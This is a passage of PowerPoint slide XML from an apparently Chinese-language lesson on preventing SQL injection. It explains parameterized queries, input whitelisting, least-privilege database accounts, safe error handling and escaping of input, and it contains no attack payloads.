              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>密码的哈希强制</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对字符串进行编码和解码 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="101" name="图片 100"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11927205" y="5339716"/>
            <a:ext cx="12039600" cy="7696199"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 238">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E51A271-4E72-E462-CC12-240FB4F28811}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466132" y="400308"/>
            <a:ext cx="586246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注入检测工具</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p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>............</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="100" name="图片 99"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="14738985" y="5041900"/>
            <a:ext cx="9385935" cy="7044055"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 238">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{268E7AE5-04E8-DE97-208C-8B5EB22C6423}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466132" y="400308"/>
            <a:ext cx="586246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注入检测工具</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985542" y="420101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、参数化查询（预编译）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、严格过滤</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、最小化数据库的权限</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、对输入进行转义</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、使用安全编码最佳实践</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97DDA447-2935-65D0-B1A6-4E0548378D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5542" y="7989266"/>
            <a:ext cx="15678004" cy="3950202"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{980827E9-042C-C995-2971-CF8536D8F0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69732" y="1997696"/>
            <a:ext cx="7458075" cy="7458075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34608669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9140964"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、参数化查询和预编译</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参数化查询是防止 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入的首选方法。参数化查询将 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语句与参数分开，并使用占位符（例如 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）表示参数。在执行查询时，数据库将参数与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语句进行安全的绑定，确保攻击者无法篡改 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语句。参数化查询通常与预编译语句一起使用，在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Java </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中，我们可以使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>PreparedStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>实现参数化查询。</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Spring Boot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中，我们通常使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JPA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Java Persistence API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）或其他 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ORM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Object-Relational Mapping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）框架如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MyBatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>来操作数据库。这些框架本身就支持参数化查询，因此可以有效防止 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入。当我们使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JPA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>或 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MyBatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>时，应尽量避免拼接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语句，而是使用框架提供的安全查询方式。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>预编译虽然可以极大地降低</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入的风险，但并不能完全避免</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入。例如，如果应用程序中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语句中使用了动态生成的表名、列名或操作符等，而这些变量没有被正确地处理，那么就有可能导致</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入攻击。</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zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2、严格过滤</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应该对所有的输入数据进行过滤和验证，确保输入的数据符合预期的格式和类型。输入过滤和验证可以减少攻击者插入恶意代码的机会。通常情况下，过滤方式有以下几种：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>白名单过滤：只允许输入指定的字符或者格式，其余字符会被过滤掉，应优先使用白名单，黑名单存在绕过可能。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>黑名单过滤：禁止输入指定的字符或者格式，其余字符可以通过。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>限制查询长度：由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入过程中需要构造较长的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>语句，因此，一些特定的程序可以使用限制用户提交的请求内容的长度来达到防御</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入的目的，但这种效果不佳。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>限制查询类型：限制用户请求内容中每个字段的类型，并在用户提交请求的时候进行检查，凡不符合该类型的提交方式就认为是非法请求。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>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7848302"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、设置最小权限原则</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配置数据库连接时，遵循最小权限原则，即应用程序用户只能访问和操作它们真正需要的数据库资源。例如，如果应用程序只需要从某个表中读取数据，那么该应用程序用户不应该具有对该表的写入或删除权限。这样，在遇到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入攻击时，即使攻击者成功注入恶意 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>代码，他们也无法对数据库执行危害性较大的操作。</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4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>安全错误处理：避免将详细的错误信息直接显示给用户，特别是在生产环境中，应避免网站打印出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语句暴露出来。确保错误信息仅记录在日志文件中，而不是暴露给用户，以防止攻击者利用错误信息来进一步利用漏洞。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用安全编码实践：采用安全的编程实践，如避免动态拼接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>查询字符串、使用安全的字符转义函数、避免将敏感信息明文存储在数据库中等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6</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对进入数据库的特殊字符（’’尖括号 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&amp;*; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
